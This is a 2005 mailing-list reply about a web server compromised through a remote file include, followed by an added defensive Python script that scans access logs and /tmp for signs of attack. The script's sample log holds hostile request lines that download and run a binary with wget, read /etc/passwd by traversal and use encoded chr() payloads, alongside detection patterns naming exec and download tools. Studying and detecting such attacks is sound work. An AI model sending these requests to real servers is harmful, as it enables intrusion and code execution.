
Re: a compromised machine

On Sun, Jul 24, 2005 at 09:54:28AM +0200, Nejc Novak wrote:
> I think one of my servers has been compromised. Since I don't have a lot
> of experience with these things, I beg you for your help.
> The information I have gathered so far is the following. The server
> is running the latest Debian stable, sarge.
> There was heavy traffic on the server and ps aux reported several 
> processes:
> www-data  2459  0.0  0.1  1616  608 ?        S    01:31   0:00 
> /tmp/dlciiqlno x

Since the process runs as "www-data", some kiddy has abused a web service
on your server to download and run external software. Look for
suspicious log lines in your web server's logs.

Examples of hacks on our servers:

 - - [26/Feb/2005:20:04:59 +0100] "GET HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)"

211-255-23-42.rev.krline.net - - [04/Dec/2004:17:43:06 +0100] "GET 1.0" 200 28732 "-" "PHP/4.3.4"

It should be rather easy to find signs of weird accesses, like %20 or
chr(). Also look for weird signs in /tmp.

If your server is important you should consider reinstalling.


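The two checks the reply recommends, grepping the access log for remote-include and shell-command residue (%20, chr(), wget, /tmp) and looking at /tmp for a dropped binary, as an added example in Python. This is not code from the thread or from the posters; the indicator list is a heuristic of my own, and the sample log lines at the bottom are constructed (RFC 5737 documentation addresses, a made-up file name), modelled on the kind of entries quoted above rather than copied from any real server.

```python
"""Hunt for requests that drop a payload into /tmp and run it as the
web server user.  Added example, not code from the thread above; the
log lines at the bottom are constructed, not taken from a real server."""
import os
import re
import stat
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$'
)

# Heuristic indicators (assumption: this list is mine, not a standard one).
# They are matched against the percent-DEcoded request line, so
# "cd%20/tmp" and "cd /tmp" hit the same rule.
INDICATORS = [
    ("remote-include", re.compile(r'=\s*(?:https?|ftp)://', re.I)),  # ?page=http://evil/x.txt
    ("php-chr",        re.compile(r'\bchr\s*\(', re.I)),              # chr(112).chr(104) obfuscation
    ("php-code",       re.compile(r'\b(?:system|passthru|exec|shell_exec|eval)\s*\(', re.I)),
    ("shell-download", re.compile(r'\b(?:wget|curl|fetch|lynx)\b', re.I)),
    ("tmp-path",       re.compile(r'/(?:tmp|var/tmp|dev/shm)\b', re.I)),
    ("cmd-separator",  re.compile(r'[;|`]|\$\(')),
    ("traversal",      re.compile(r'\.\./')),
]
# A User-Agent of "PHP/x.y.z" means a PHP script fetched this URL through
# its stream wrapper, which is what an include chain looks like from the
# victim's side.
AGENT_RE = re.compile(r'^PHP/|libwww-perl', re.I)


def analyze_line(line):
    """Parse one access-log line; return a record with the names of the
    indicators that fired, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = m.group("request")
    decoded = unquote(unquote(req))        # twice: %2528 -> %28 -> "("
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    agent = m.group("agent") or ""
    if AGENT_RE.search(agent):
        hits.append("odd-agent")
    # A literal %20 in the *path* (before any "?") is rare for real clients.
    parts = req.split(" ")
    path = parts[1] if len(parts) > 1 else req
    if "%20" in path.split("?")[0]:
        hits.append("encoded-space-in-path")
    return {"host": m.group("host"), "time": m.group("time"), "request": req,
            "status": m.group("status"), "agent": agent, "hits": hits}


def scan(lines):
    """Return the records of all lines that triggered at least one indicator."""
    out = []
    for line in lines:
        rec = analyze_line(line)
        if rec and rec["hits"]:
            out.append(rec)
    return out


def is_dropped_binary(mode, head):
    """True for a regular file that is executable or starts with the ELF
    magic, i.e. the shape of /tmp/dlciiqlno.  mode is st_mode, head the
    first four bytes of the file."""
    exec_bits = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH
    return stat.S_ISREG(mode) and (bool(mode & exec_bits) or head == b"\x7fELF")


def scan_tmp(directory="/tmp"):
    """List files under a directory that look like dropped payloads."""
    found = []
    for entry in os.scandir(directory):
        try:
            st = entry.stat(follow_symlinks=False)
            head = b""
            if stat.S_ISREG(st.st_mode):
                with open(entry.path, "rb") as fh:
                    head = fh.read(4)
        except OSError:
            continue
        if is_dropped_binary(st.st_mode, head):
            found.append(entry.path)
    return found


# Constructed sample log: one benign request, then an include-and-run
# chain, the PHP wrapper fetching the include, double-encoded chr(), and
# an encoded space plus traversal in the path.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2005:01:29:10 +0200] "GET /index.php?page=news HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [24/Jul/2005:01:31:02 +0200] "GET /index.php?page=http://203.0.113.7/x.txt?&cmd=cd%20/tmp;wget%20http://203.0.113.7/dlciiqlno;chmod%20+x%20dlciiqlno;./dlciiqlno HTTP/1.1" 200 422 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '198.51.100.9 - - [24/Jul/2005:01:31:03 +0200] "GET /x.txt HTTP/1.0" 200 28732 "-" "PHP/4.3.4"',
    '192.0.2.44 - - [24/Jul/2005:01:30:55 +0200] "GET /forum/index.php?s=&act=chr%2528112%2529.chr%2528104%2529 HTTP/1.1" 500 0 "-" "-"',
    '192.0.2.9 - - [24/Jul/2005:01:32:40 +0200] "GET /admin/%20../../etc/passwd HTTP/1.1" 404 300 "-" "curl/7.13"',
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["host"], rec["time"], ",".join(rec["hits"]), rec["request"])
    print("suspicious files:", scan_tmp())
```

Run it against a real log with `scan(open("/var/log/apache2/access.log"))`; the double `unquote` is what keeps `%2528` from slipping past a plain grep for `chr(`. Treat the hits as leads, not proof: a site that legitimately passes URLs in query strings will trip "remote-include", and a /tmp full of session files will not trip `scan_tmp` at all, which is exactly why the reply ends with "consider reinstalling".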